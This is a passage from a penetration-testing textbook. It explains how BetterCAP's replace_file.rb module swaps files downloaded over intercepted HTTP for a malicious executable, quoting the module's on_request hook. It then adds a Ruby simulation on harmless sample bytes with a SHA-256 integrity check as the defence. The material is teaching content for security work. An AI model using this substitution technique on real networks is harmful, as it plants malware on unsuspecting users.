Hands-On Penetration Testing on Windows

The Ruby file injection proxy module – replace_file.rb

A crash course in Ruby is beyond the scope of this discussion, but a basic programming background should be enough to see that there isn't much going on in this module. This is good news for those of us who were worried that writing custom modules for BetterCAP would be out of reach without significant coding skill. Take a look at this module, written by the author of BetterCAP (only the final part, containing the on_request method, is shown here):

  # Hook that BetterCAP's HTTP proxy calls for every request/response pair.
  def on_request( request, response )
    # Only act on requests whose path contains the configured extension.
    if request.path.include?(".#{@@extension}")
      BetterCap::Logger.info "Replacing http://#{request.host}#{request.path} with #{@@filename}."

      # Swap the served file for the payload and make the length header match it.
      response['Content-Length'] = @@payload.bytesize
      response.body = @@payload
    end
  end
end  # closes the module's class, which is defined in the part not shown above

Most of the module's code (the part not shown) defines the inputs, user-friendly descriptions of the options, and a little error handling. The meat and potatoes are at the end, where the on_request method is defined. Its body is a single if statement:

if request.path.include?(".#{@@extension}")

The code checks the path of the victim's requested URL for the file extension we define. If we're replacing .exe files, then any request path containing .exe will trigger the condition, and BetterCap::Logger.info prints a notice in BetterCAP's terminal window. The response is then rewritten with two lines:

response['Content-Length'] = @@payload.bytesize
response.body = @@payload

The Content-Length header is replaced with the actual size of our payload (namely, the malicious executable), and the body becomes the binary payload itself. This matters because only the body is being replaced; the rest of the response that reaches the application layer (status line, remaining headers) is genuinely from the requested site. This means that if a user clicks a link for a file called example.exe, the browser will show example.exe being downloaded regardless of what the source executable sitting on Kali is named.
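To make the two points above concrete (the path-extension match plus the paired body and Content-Length rewrite, and the fact that the rest of the response is untouched), here is an added, self-contained Ruby example that is not part of BetterCAP or of the book's module. It models the on_request logic against stub Request and Response objects (assumed shapes, simplified from BetterCAP's real classes; instance variables replace the module's @@ class variables) on constructed sample bytes, and then shows the check a defender relies on when a download may have been altered in transit: comparing the received bytes with a SHA-256 digest published out of band.

```ruby
require 'digest'

# Stub stand-ins for the objects BetterCAP passes to on_request.
# Assumption: the real classes expose host, path, header access and body,
# which is all the module on this page uses.
Request = Struct.new(:host, :path)

class Response
  attr_accessor :body

  def initialize(headers, body)
    @headers = headers
    @body = body
  end

  def [](key)
    @headers[key]
  end

  def []=(key, value)
    @headers[key] = value
  end
end

# Mirrors the decision in replace_file.rb: match on the extension in the
# request path, then overwrite the body and fix Content-Length to match.
class ReplaceFileHook
  attr_reader :log

  def initialize(extension, payload)
    @extension = extension   # e.g. "exe"
    @payload = payload       # bytes that would replace the served file
    @log = []                # stands in for BetterCap::Logger.info
  end

  # Returns true when the response was rewritten, false when passed through.
  def on_request(request, response)
    return false unless request.path.include?(".#{@extension}")

    @log << "Replacing http://#{request.host}#{request.path}"
    response['Content-Length'] = @payload.bytesize
    response.body = @payload
    true
  end
end

# Defender-side integrity check: the bytes the client received must match a
# digest obtained over a channel the proxy cannot rewrite (e.g. the vendor's
# HTTPS page). A substituted body fails this check no matter what its name is.
def download_intact?(body, expected_sha256)
  Digest::SHA256.hexdigest(body) == expected_sha256
end

# Walks a matching .exe request through the hook and reports what changed.
def run_demo
  genuine = "MZ\x90\x00genuine-example-binary".b      # constructed sample bytes
  expected = Digest::SHA256.hexdigest(genuine)
  substitute = "MZ\x90\x00constructed-substitute".b   # constructed sample bytes
  hook = ReplaceFileHook.new("exe", substitute)

  req = Request.new("downloads.example.test", "/files/example.exe")
  res = Response.new({ 'Content-Length' => genuine.bytesize, 'Server' => 'nginx' }, genuine.dup)
  replaced = hook.on_request(req, res)

  {
    replaced: replaced,
    length_matches_body: res['Content-Length'] == res.body.bytesize,
    server_header_untouched: res['Server'] == 'nginx',
    integrity_ok: download_intact?(res.body, expected)
  }
end

# A request for a non-matching extension passes through untouched.
def run_passthrough
  hook = ReplaceFileHook.new("exe", "x".b)
  req = Request.new("downloads.example.test", "/files/readme.txt")
  res = Response.new({ 'Content-Length' => 5 }, "hello")
  hook.on_request(req, res) == false && res.body == "hello"
end

puts run_demo.inspect if $PROGRAM_NAME == __FILE__
```

Running run_demo shows the rewritten response has a Content-Length that matches its new body and an unchanged Server header (the "everything else is genuine" property from the text), while the integrity check fails, which is exactly why published digests and HTTPS-only downloads are the standard mitigation for file replacement in transit.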